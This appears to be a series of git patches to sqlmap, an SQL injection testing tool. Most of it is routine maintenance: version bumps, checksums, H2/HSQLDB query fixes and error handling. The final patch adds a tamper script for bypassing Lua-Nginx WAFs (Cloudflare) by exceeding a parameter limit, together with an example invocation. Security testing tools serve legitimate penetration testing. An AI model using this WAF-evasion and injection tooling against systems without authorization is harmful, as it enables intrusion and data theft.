92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -c83a948e23219f1d101d3b3aa7eb1391 xml/queries.xml +67fa3c0ae62e866763be0dffebf19855 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index ee1cf5ed767..176568bf644 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -739,7 +739,7 @@ - mirek + From 0d2db3253903fe61f316c1040dcc52dd358ec731 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 14:47:09 +0200 Subject: [PATCH 329/428] Finalizing #3283 --- lib/core/settings.py | 2 +- plugins/generic/databases.py | 6 +++++- plugins/generic/search.py | 13 +++++++++---- txt/checksum.md5 | 8 ++++---- xml/queries.xml | 12 ++++++------ 5 files changed, 25 insertions(+), 16 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 75f7fd2c8cd..3bb0be61ae8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.23" +VERSION = "1.2.10.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index b63e57979e1..12a0b7ccad2 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -757,10 +757,14 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod continue for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None + elif Backend.isDbms(DBMS.H2): + query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) + query = query.replace(" ORDER BY ", "%s ORDER BY " % condQuery) + field = None elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery diff --git a/plugins/generic/search.py b/plugins/generic/search.py index e07e98bf6eb..e316c1ebc62 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -60,7 +60,7 @@ def searchDb(self): values = [] db = safeSQLIdentificatorNaming(db) - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): db = db.upper() infoMsg = "searching database" @@ -167,8 +167,9 @@ def searchTable(self): values = [] tbl = safeSQLIdentificatorNaming(tbl, True) - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2): tbl = tbl.upper() + conf.db = conf.db.upper() if conf.db else conf.db infoMsg = "searching table" if tblConsider == '1': @@ -303,7 +304,9 @@ def searchTable(self): for index in indexRange: query = rootQuery.blind.query2 - if query.endswith("'%s')"): + if " ORDER BY " in query: + query = query.replace(" ORDER BY ", "%s ORDER BY " % (" AND %s" % tblQuery)) + elif query.endswith("'%s')"): query = query[:-1] + " AND %s)" % tblQuery else: query += " AND %s" % tblQuery @@ -387,8 +390,10 @@ def searchColumn(self): conf.db = origDb conf.tbl = origTbl - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): column = column.upper() + conf.db = conf.db.upper() if conf.db else conf.db + conf.tbl = conf.tbl.upper() if conf.tbl else conf.tbl infoMsg = "searching column" if colConsider == "1": diff --git a/txt/checksum.md5 b/txt/checksum.md5 index eea24bbaac2..1497701b96d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dd0f57aae1f982454ab4ec1ba1dcbda2 lib/core/settings.py +daf454e49b91d6bed48ec832c4b6f727 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -213,14 +213,14 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -dd0875db408080c8192c5186d2d9c246 plugins/generic/databases.py +3d75e831574c750ed58e24eaa562c056 plugins/generic/databases.py 35546acab0eea406c23b84363df4d534 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py -b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py +30b421f06dc98998ddc1923a9048b7fc plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py e762c77ff79e4c138145501f6fbb10cb plugins/generic/users.py @@ -484,4 +484,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -67fa3c0ae62e866763be0dffebf19855 xml/queries.xml +7bbf2a82593efffc68e8001299a5691f xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index 176568bf644..5c0e5c92169 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -770,16 +770,16 @@ - - + + - - + + - - + + From c045afd8425d6ea4edbb8b1274ad3fb5d104593a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 14:53:41 +0200 Subject: [PATCH 330/428] Minor cleanup --- lib/core/settings.py | 2 +- plugins/dbms/h2/filesystem.py | 2 +- plugins/dbms/hsqldb/filesystem.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3bb0be61ae8..2b339b04d26 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.24" +VERSION = "1.2.10.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/h2/filesystem.py b/plugins/dbms/h2/filesystem.py index 7542ffb60cd..b082a335ed5 100644 --- a/plugins/dbms/h2/filesystem.py +++ b/plugins/dbms/h2/filesystem.py @@ -17,5 +17,5 @@ def readFile(self, rFile): raise SqlmapUnsupportedFeatureException(errMsg) def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on H2 it is not possible to read files" + errMsg = "on H2 it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py index bdbcafef126..de9c14d9593 100644 --- a/plugins/dbms/hsqldb/filesystem.py +++ b/plugins/dbms/hsqldb/filesystem.py @@ -17,5 +17,5 @@ def readFile(self, rFile): raise SqlmapUnsupportedFeatureException(errMsg) def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on HSQLDB it is not possible to read files" + errMsg = "on HSQLDB it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1497701b96d..38b7ff1c2e3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -daf454e49b91d6bed48ec832c4b6f727 lib/core/settings.py +7ecc4951e86c97f09c53dbfb57e643e0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -142,14 +142,14 @@ c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py 79c44d8d0dffc140d38796a32e92a66a plugins/dbms/h2/connector.py 5b99e9a60409f54a140747ce1ca0342f plugins/dbms/h2/enumeration.py -b1ed542fff0aa53c54e8bc07658aeaf1 plugins/dbms/h2/filesystem.py +36522c36650afc43c1166ab68b297ecb plugins/dbms/h2/filesystem.py 4fe530d10b74210bd045205d9318b5d6 plugins/dbms/h2/fingerprint.py 1de698e4cfddd754ffe31ea2640a481a plugins/dbms/h2/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/h2/syntax.py af746ef421cfefedc1aaa9dca1503de2 plugins/dbms/h2/takeover.py 271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py -616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py +7747ad6cc12e295ba3fb4518ac083d1e plugins/dbms/hsqldb/filesystem.py b061bdbb9159c449072fde51b444f1c0 plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py From e52422900e45fbb851deaaa604dde5136bf16715 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 19:37:27 +0200 Subject: [PATCH 331/428] Fixes #3303 --- lib/core/dicts.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 5cfb8633c75..242599e69af 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -196,7 +196,7 @@ DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), - DBMS.H2: (H2_ALIASES, None, None), + DBMS.H2: (H2_ALIASES, None, None, None), DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), } diff --git a/lib/core/settings.py b/lib/core/settings.py index 2b339b04d26..ab549d62784 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.25" +VERSION = "1.2.10.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 38b7ff1c2e3..26afa345181 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -35,7 +35,7 @@ ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -56b79ee7acd2da19c1678250edfdafab lib/core/dicts.py +ac7c070b2726d39fbac1916b1a5f92b2 lib/core/dicts.py 760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py ee7da34f4947739778a07d6c9c05ab54 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7ecc4951e86c97f09c53dbfb57e643e0 lib/core/settings.py +ae5de169849869a08f920e52c0fadb8a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py From feb93dce4461272c4c8135b5a6c407ffd9f5bccf Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 17 Oct 2018 12:24:52 +0200 Subject: [PATCH 332/428] Update related to the #3304 --- lib/controller/checks.py | 8 -------- lib/controller/controller.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 5 insertions(+), 13 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 4ef33249b3c..d0f9a8b1018 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1117,14 +1117,6 @@ def checkDynParam(place, parameter, value): try: payload = agent.payload(place, parameter, value, getUnicode(randInt)) dynResult = Request.queryPage(payload, place, raise404=False) - - if not dynResult: - infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter) - logger.info(infoMsg) - - randInt = randomInt() - payload = agent.payload(place, parameter, value, getUnicode(randInt)) - dynResult = Request.queryPage(payload, place, raise404=False) except SqlmapConnectionException: pass diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 16395be1c54..a5f15ea3956 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -529,7 +529,7 @@ def start(): testSqlInj = False else: - infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter) + infoMsg = "%s parameter '%s' appears to be dynamic" % (paramType, parameter) logger.info(infoMsg) kb.testedParams.add(paramKey) diff --git a/lib/core/settings.py b/lib/core/settings.py index ab549d62784..93a2136c70e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.26" +VERSION = "1.2.10.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 26afa345181..08f04577460 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -23,8 +23,8 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -84316968d7235f53aac7e25069128725 lib/controller/checks.py -d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py +fab20cff41611d4fcb4e426e2c7704da lib/controller/checks.py +250d3cf5ea54b8fe1e91fd611b0044ab lib/controller/controller.py 97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ae5de169849869a08f920e52c0fadb8a lib/core/settings.py +72fce2cc366c9008550703643f8a6cc7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py From f52beff7c3f2d7a77202d382035c46fb66aaa13b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 22 Oct 2018 11:21:30 +0200 Subject: [PATCH 333/428] Minor patch to handle late ImportError reports --- lib/core/settings.py | 2 +- sqlmap.py | 41 +++++++++++++++++++---------------------- txt/checksum.md5 | 4 ++-- 3 files changed, 22 insertions(+), 25 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 93a2136c70e..e7cf7a45cab 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.27" +VERSION = "1.2.10.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 3f749d23fbd..c8b9fc81f17 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -234,60 +234,65 @@ def main(): dataToStdout(excMsg) raise SystemExit + elif "ImportError" in excMsg: + errMsg = "invalid runtime environment ('%s')" % excMsg.split("ImportError: ")[-1].strip() + logger.critical(errMsg) + raise SystemExit + elif "MemoryError" in excMsg: errMsg = "memory exhaustion detected" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): errMsg = "no space left on output device" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "Violation of BIDI" in excMsg: errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7.x. Please update accordingly " errMsg += "(Reference: https://bugs.python.org/issue8104)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "can't start new thread" in excMsg: @@ -295,34 +300,26 @@ def main(): errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): errMsg = "there has been a problem in enumeration. " errMsg += "Because of a considerable chance of false-positive case " errMsg += "you are advised to rerun with switch '--flush-session'" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") errMsg += ". Please delete .pyc files on your system to fix the problem" - logger.error(errMsg) - raise SystemExit - - elif "url = url.strip()" in excMsg: - dataToStdout(excMsg) - print - errMsg = "please contact 'miroslav@sqlmap.org' with details for this issue " - errMsg += "as he is trying to reproduce it for long time" - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit elif kb.get("dumpKeyboardInterrupt"): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 08f04577460..cf5220d06ad 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -72fce2cc366c9008550703643f8a6cc7 lib/core/settings.py +85a3e168b4685df50ceb26fa9bdf8cad lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -d94547672ec6dbc4c2adffbf62bd36d4 sqlmap.py +b84c70803012a374385ecc3e41a7e0dc sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 132e963b538275dd643a069f44374995baf67b13 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 24 Oct 2018 15:12:13 +0200 Subject: [PATCH 334/428] More general TypeMismatchException (for Hibernate too) --- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e7cf7a45cab..079002946ca 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.28" +VERSION = "1.2.10.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -683,7 +683,7 @@ MAX_CONNECT_RETRIES = 100 # Strings for detecting formatting errors -FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cf5220d06ad..c19b544bbb1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -85a3e168b4685df50ceb26fa9bdf8cad lib/core/settings.py +77783316b43fe36fee4d5a987d4c612b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py From dc65afe65a86b25029c561a78545491e660562e2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 24 Oct 2018 16:33:23 +0200 Subject: [PATCH 335/428] Minor update related to the #3283 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/errors.xml | 5 +++++ 3 files changed, 8 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 079002946ca..291931dca81 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.29" +VERSION = "1.2.10.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c19b544bbb1..843620ab7a1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -77783316b43fe36fee4d5a987d4c612b lib/core/settings.py +8abd15c74363a1de79976adeb95fba4a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -476,7 +476,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml +a676d93d413b07d36495201d88671253 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml diff --git a/xml/errors.xml b/xml/errors.xml index 5889f842eb9..e8001c3b937 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -135,4 +135,9 @@ + + + + + From 4466504f30dd5182b5e160bf987ec69df03ae9a8 Mon Sep 17 00:00:00 2001 From: Jennifer Torres Date: Fri, 26 Oct 2018 11:04:37 +0100 Subject: [PATCH 336/428] Lua-Nginx WAFs Bypass (#3316) * Lua-Nginx WAFs Bypass Lua-Nginx WAFs doesn't support processing for more than 100 parameters. https://www.youtube.com/watch?v=JUvro7cqidY * Update luanginxwafbypass.py * Update luanginxwafbypass.py * Update luanginxwafbypass.py * Update luanginxwafbypass.py Update header. * Update luanginxwafbypass.py --- tamper/luanginxwafbypass.py | 51 +++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 tamper/luanginxwafbypass.py diff --git a/tamper/luanginxwafbypass.py b/tamper/luanginxwafbypass.py new file mode 100644 index 00000000000..5b694545b69 --- /dev/null +++ b/tamper/luanginxwafbypass.py @@ -0,0 +1,51 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +''' +[+] LUA-Nginx WAFs Bypass (Cloudflare) +Lua-Nginx WAFs doesn't support processing for more than 100 parameters. + +Example: sqlmap -r file.txt --tamper=luanginxwafbypass.py --dbs --skip-urlencode -p vulnparameter +Required options: --skip-urlencode, -p +''' + +import sys +import string +import random +from lib.core.enums import 